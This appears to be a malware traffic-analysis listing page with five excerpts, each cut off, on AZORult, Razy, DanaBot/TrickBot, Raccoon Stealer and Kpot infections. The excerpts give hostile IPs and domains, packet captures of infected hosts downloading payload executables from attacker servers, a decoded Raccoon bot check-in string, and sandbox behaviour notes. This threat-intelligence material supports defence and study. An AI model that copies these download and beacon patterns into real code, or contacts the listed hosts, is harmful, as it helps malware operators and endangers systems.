Racoon Crimeware Malware PCAP File Download AZORult MSILPerseus tribunal.ug

Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification: DownloaderSpyware Threat Names: AZORult v3Gen:Variant.MSILPerseus.224291Trojan.GenericKD.42815195 2020-05-29 20:39:31.460098 IP 10.1.10.15.49233 > 217.8.117.45.80: Flags [P.], seq 1:504, ack 1, win 16425, length 503: HTTP: GET /zxcvb.exe HTTP/1.1 E…..@….. . …u-.Q.P?…..j.P.@).7..GET /zxcvb.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=101892- Unless-Modified-Since: Wed, 27 May 2020 16:24:13 GMT If-Range: “43200-5a6a3a481cf60” Host: tribunal.ug Connection: Keep-Alive 2020-05-29 20:39:31.615857 IP 217.8.117.45.80 > 10.1.10.15.49233: Flags [.], […]

Razy Malware Crimeware PCAP File Download Traffic Analysis system.exe gasfer.ru

Malware downloads and loads the dropper from the 64.31.23.26 but the host is down so it dies at this point. Hostile IPs: 64.31.23.26 81.177.135.143 2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1 E…..@….! . .Q….S.P……..P.@)Zs..GET /system.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: gasfer.ru Connection: Keep-Alive 2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0 E..(..@….. […]

DanaBot TrickBot Malware PCAP File Download Traffic Analysis 185.45.193.50 193.34.166.247

Hostile IPs: 176.123.7.51 185.45.193.50 193.34.166.247 95.163.181.123 Tags: DanaBot  Gozi  Quakbot  Trickbot  2020-05-29 21:10:54.694365 IP 10.1.10.15.49218 > 176.123.7.51.80: Flags [P.], seq 1:506, ack 1, win 16425, length 505: HTTP: GET /22JUM.exe HTTP/1.1 E..!..@…(S . ..{.3.B.P..?q….P.@).F..GET /22JUM.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=202587- Unless-Modified-Since: Sat, 30 May 2020 01:00:27 GMT If-Range: “293800-5a6d31663c571” Host: 176.123.7.51 Connection: Keep-Alive 2020-05-29 21:10:54.844053 IP 176.123.7.51.80 > 10.1.10.15.49218: Flags [.], ack 506, win 237, length 0 E..(<.@.-.E(.{.3 . ..P.B……AjP…u%…….. 2020-05-29 21:10:54.846062 IP […]

Raccoon Stealer infection Malware svchost.exe 217.8.117.89 34.89.22.128

This is the latest sample of Raccoon which is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019. This malware uses base64 encoding for each infected host as you can see below in the packets and here is what it looks like decoded: echo “Ym90X2lkPUQ1MDE3MUYzLUIxRkQtNDFDOS1BRkJGLTNERDJGNzJDOTBCN19yeTR3biZjb25maWdfaWQ9MjE0MWRhOTJiNGFkM2FjODM3ZTAxNjc1Y2UzYTE2ODE4ODUzOTVlMCZkYXRhPW51bGw=” | base64 -d bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null bot_id=D50171F3-B1FD-41C9-AFBF-3DD2F72C90B7_ry4wn&config_id=2141da92b4ad3ac837e01675ce3a1681885395e0&data=null 2020-05-09 02:34:34.532063 IP 192.168.86.25.56399 > 217.8.117.89.80: Flags [P.], seq 1:398, ack 1, win 16425, […]

Kpot Mikey Malware Sample PCAP File Download Traffic Analysis pollarr.top

What Kryptik virus can do? Executable code extraction Attempts to connect to a dead IP:Port (1 unique times) Creates RWX memory A process attempted to delay the analysis task. Expresses interest in specific running processes HTTP traffic contains suspicious features which may be indicative of malware related traffic Performs some HTTP requests The binary likely contains encrypted or compressed data. Detects Sandboxie through the presence of a library Checks for the presence of known windows from debuggers and forensic tools Attempts to repeatedly call a single API many times in order to delay analysis time Steals private information from local Internet […]